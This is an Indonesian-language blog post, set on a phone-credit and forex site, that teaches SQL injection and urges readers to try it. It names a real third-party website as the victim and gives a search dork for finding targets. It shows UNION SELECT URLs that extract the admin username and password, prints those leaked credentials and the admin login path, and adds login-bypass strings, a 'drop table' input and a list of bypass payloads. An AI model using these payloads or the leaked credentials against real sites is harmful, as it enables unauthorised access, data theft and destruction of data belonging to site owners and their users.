PULSA-Pulsa Termurah |Dealer Pulsa Elektrik-Distributor Pulsa Murah Bisnis Pulsa Elektrik Pulsa murah Voucher Elektronik USSD Download gratis Free Forex MT4 EA Expert Advisor Fusion
Selasa, 2016-12-06, 1:11 PM

Pulsa Elektrik Termurah Jateng-Jakarta-Jogja-Jatim_Bandung

Almanak
«  Pebruari 2010  »
MgSenSelRbKmJmSb
 123456
78910111213
14151617181920
21222324252627
28
Detail Menu
Tehnik Hacking [28]
Tehnik Hacking, cracking, deface, virus, anti virus, carding , SQL Injection dll
Tehnik SEO [0]
SEO tools, trik dan tips ranking 1 google
info Pulsa elektrik [22]
Berita seputar Pulsa, Bisnis Pulsa, Software Pulsa, Info Pulsa, Server pulsa elektrik murah, Tips dan Trik dll
Ilmu Marifat [0]
Kumpulan ilmu marifat, dan tauhid
Ilmu Kejawen [1]
Berbagai ragam ngelmu dan ilmu jawa
Link Download Gratis [10]
Aneka link Download Software, Ebook, Aplikasi, Antivirus dll Gratis/Free
Tehnik Internet [9]
aneka tips dan trik rahasia seputar internet
Trik Komputer [10]
Trik seputar Ilmu Komputer software maupun hardwarenya
Berita Terbaru Hot & Heboh [1]
Berita Terbaru Hot & Heboh
Motivasi dan Filsafat [0]
Artikel seputar Filsafat dan Motivasi Hidup
Bisnis dan Peluang Usaha [0]
Bisnis dan Peluang Usaha
Rahasia Bisnis Forex [104]
Tentang Trik dan Tips rahasia bermain Forex menghasilkan Frofit ,Metatrader, MT4, MT5,AE, Signal Indikator, valas dll


Pulsa Elektrik
Download Gratis
Menu Utama
Free Backlink
Business Blogs
business blog Free Backlink Exchange-Tukar Link Sistema Enlaces Reciprocos Sistema Enlaces Reciprocos
Just copy this banner code to your website or blog:This program is a free automatic backlinks exchange services and free web traffic from other users. Everyone knows how important backlinks to get a high pagerank. Here, we offer a backlink for free and very fast for your sites. Copy the html code first, and then paste to your website or blog. To view your backlink you can click the image link from your website or blog. And well... your website url done and will be displaying in last references. If any visitors click this banner from your website or blog, your url backlink will be creating automatically in this website. Enjoy with this seo tricks.   

Recent Referer Backlinks

Backlink Friend

Free Automatic Backlink Free Automatic Backlink Kostenlose Backlink Austausch Cárdenas.net Free Backlinks DAHOAM Free Backlinks Linki Linki Free Backlinks ECBanner Die Gute Saat Free Automatic Link Die Gute Saat Free Automatic Link Free Backlinks Exchange Free Automatic Link kostenlose backlinks Free Automatic Link echange de liens Free Automatic Link Free Automatic Link Intercambio de enlaces Free Automatic Link Free Automatic Link Free Automatic Link Free Automatic Link Free Automatic Elvira Links Free Automatic Link Free Automatic Link Intercambio gratis de Enlaces Free Backlinks Free Backlinks Free Backlinks Free Backlinks Enlaces Gratis Unlimited Backlink Exchange Unlimited Backlink Exchange Free Backlinks Streichquartett Tradiciones Peruanas de Ricardo Palma














Streichquartett Automatic Backlink Exchange Free Automatic Link Multiple Backlinks


La Bonne Semence Free Automatic Link Plugboard Free Backlink Exchange
Web Link Exchange Text Backlink Exchanges Soqoo Link Exchange Text Back Link Exchange Text Back Links Exchange Text Back Links Exchanges backlink Hochzeitsmusik - Streichquartett backlink backlink Free Auto Backlink Generator Get a Free Backlink Florists Links top backlinks referers free Get a Free Backlink trafic backlinks Kostenlose Backlinks bei http://www.backlink-clever.de
SEO-Supreme Professional search tools for free referents backlinks backlinks refere free instant backlink for blog and website
Main » 2010 » Pebruari » 9 » SQL Injection pada X-Ice System V-1
3:51 AM
SQL Injection pada X-Ice System V-1

SQL Injection pada X-Ice System V-1 

www.infopulsa.ucoz.com Info Pulsa USSD Bisnis Pulsa Elektrik Murah gratis Free Software


kali ini saya akan mencoba
mengajak anda untuk bersama-sama mengeksploitasi website yang memiliki bug SQL Injection.
Bug di X-Ice system ditemukan oleh Cyberghost beberapa hari yang lalu, tapi sampai saat ini masih banyak
vulnerability dari situs-situs yang masih bisa dimanfaatkan [red: exploitasi].
Ya, mungkin cukup sekian pengantarnya, terima kasih. Dadah… :)
Disini saya tidak akan menjelaskan secara detil bagaimana query didapatkan, karena butuh artikel lain
untuk membahasnya, dan saya pun masih dalam tahap pembelajaran, jadi maaf-maaf aja, tutorialnya kurang lengkap.
:)

Untuk mencari targetnya, silahkan menggunakan keyword yang tepat …
ex : inurl:/devami.asp?id= geri

Korban yang saya dapatkan adalah :

http://www.radyopinarim.com/haber1/devami.asp?id=1

Untuk membuktikan websitenya vuln atau tidak anda bisa menghapus angka 1-nya.
Yang anda dapatkan adalah kurang lebih error yang seperti ini

Microsoft OLE DB Provider for ODBC Drivers hata ‘80040e14′

[Microsoft][ODBC Microsoft Access Sürücüsü] ‘id=’ sorgu ifadesi içindeki Sözdizimi hatasý (eksik iþleç)

/haber1/devami.asp, satýr 8

Dari sini silahkan tepuk tangan, karena anda masih bisa mengeksploitasi situs ini.
Untuk mencari username nya anda tinggal mengganti angka 1 dengan

-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

kurang lebih alamat di browser seperti ini :

http://www.radyopinarim.com/haber1/devami.asp?id=-1+union+select+0,

kullaniciadi,2,3,4,5,6,7+from+admin

Yang saya dapatkan usernamenya adalah Kadrius

dan untuk mencari passwordnya
:

-1+union+select+0,sifre,2,3,4,5,6,7+from+admin

passwordnya adalah 19901990

Untuk login sebagai admin anda tinggal balik kehalaman

/admin/kontrol.asp

Ya, sekian saja tutorial singkat penggunaan SQL Injection sebagai exploitasi bug X-Ice system.
Selamat mencoba, terima kasih. 

SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke ‘query’
dengan cara manipulasi data input ke applikasi tsb.
Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan MySql ,
disini gw cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5 dan
beberapa sql injection pada url.
Biasa Sql Injection dilakukan pada login page pada asp seperti di :
admin\login.asp
login.asp
sekarang kita mulai aja dengan dasar-dasar sql injection :d.
Biasanya di sql statment
select id, user_name, password from user
maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.
Bisanya pada login page dengan mengunakan statment result setnya sebagai berikut :
select id, user_name,password from user where name = ‘echo’ and password=’password’
Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browser
Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near ‘jopi’ SQL atau "Structured Query Language”
seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.
Nah, ga tau kenapa karakter single quote ‘breaks out’
dari delimiter nya SQL Jadi kalau misal ada inputan
User: echo’;drop table user–
dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya :D
oh iya ‘–’ merukapan mark nya MSSQL, jadi perintah selanjutnya ga di execute.
Sekarang untuk lebih jelasnya kita secara langsung pada login script seperti
input login + password. Nama field nya ‘login’ dan ‘pass’. dan
SQL nya di asp: var sql = select * from users where username=’”+login+”‘ and password=’”+pass”‘”;
coba kalau ada inputan: login: ‘;drop table users– pass: chfn (*wink* negative)
pasti ke drop tuh table users
Aduh pada pusing ya , gini deh cara gampangnya adn kita lupakan yang diatas :P kita langsung praktek aja>
Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari login.asp atau
admin\login.asp.
Kalau udah dapet masukin nich variable sql nya
user:admin
pass:’ or 1=1–
Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d
atau :
user:’ or 1=1–
admin:’ or 1=1–
Mas , ga bisa nich gimana ya ?
Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisa
buat sendiri script dan tes karena gw udah coba buat sendiri dan berhasil tanpa melakukan paket filter
pada db nya . Untuk test apakah suatu page mempunyai vulnerable , gini caranya :
Kalian pernh melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :
http://vivtim/index.asp?id=10

Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit tambahan
pada addressnya seperti memasukan : test’1=1–
menjadi http://victim/index.asp?id=test’1=1–
Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page target
lalu kita tamhankan hidden field pada source tersebut sebagai contoh :
<FORM action=http://victim/admin/login.asp method=post>
<input type=hidden name=A value=”test’ or 1=1–”>
</FORM>
Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username.
ingat script ini ditamhakna pd script yg sudah kalian download dr target .

Variable ‘ or 1=1–
Mungkin pada bertanya-tanya kenapa mengunakan variable ‘or 1=1– dan sangat penting.Lihat contoh
pada sebuah web tertulis http://victim/index.asp?category=laptop
Dalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb .
Kalau ditulis dalam script ASP maka akan menjadi :
v_cat = request("category”)
sqlstr=”SELECT * FROM product WHERE PCategory=’” & v_cat & "‘”
set rs=conn.execute(sqlstr)
Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pd sql statment menjadi
SELECT * FROM product WHERE PCategory=’laptop’
lalu apa hub dengan ‘or 1=1—
coba kalau kita ganti http://victim/index.asp?category=laptop menjadi
http://victim/index.asp?category=laptop’…
1=1–
Kita lihat varible v_cat sekarang menjadi laptop’or 1=1– lalu dalam SQL query nya menjadi
SELECT * FROM product WHERE PCategory=’laptop’ or 1=1–’
artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong) yang menyebabkan
Sql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkan
kita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda — merupakan
mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login page
Kita bisa masuk kedalam login page tanpa password dan user name :d.
Kemungkinan-kemungkinan variable lainya :
or 1=1–
” or 1=1–
or 1=1–
‘ or ‘a’='a
” or "a”=”a
‘) or (‘a’='a
‘ or 0=0 –
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or "x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or "a”=”a
‘) or (‘a’='a
") or ("a”=”a
hi” or "a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or ("a”=”a

www.infopulsa.ucoz.com Info Pulsa USSD Bisnis Pulsa Elektrik Murah gratis Free Software

Category: Tehnik Hacking | Views: 1086 | Added by: dibyo | Tags: BISNIS PULSA, DOWNLOAD GRATIS, pulsa murah, lifestyle on the net, sql injection, pulsa elektrik | Rating: 0.0/0
Total comments: 1
1  
huaduh, bingung sya :(

Name *:
Email *:
Code *: